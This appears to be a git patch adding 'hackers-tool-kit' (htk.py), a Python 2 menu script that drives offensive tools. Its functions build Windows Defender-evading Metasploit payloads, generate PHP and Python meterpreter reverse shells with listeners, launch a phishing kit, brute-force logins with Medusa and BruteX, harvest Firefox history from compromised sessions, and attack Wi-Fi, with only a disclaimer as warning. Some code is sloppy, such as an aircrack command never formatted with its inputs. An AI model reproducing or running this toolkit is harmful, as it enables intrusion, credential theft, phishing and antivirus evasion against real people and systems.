MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From b192c2a3651385ca02278ff5c609d46e10ab91b9 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 29 May 2019 01:33:47 +0100 Subject: [PATCH 161/214] Add files via upload --- htk.py | 3117 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3117 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..959631f --- /dev/null +++ b/htk.py @@ -0,0 +1,3117 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + 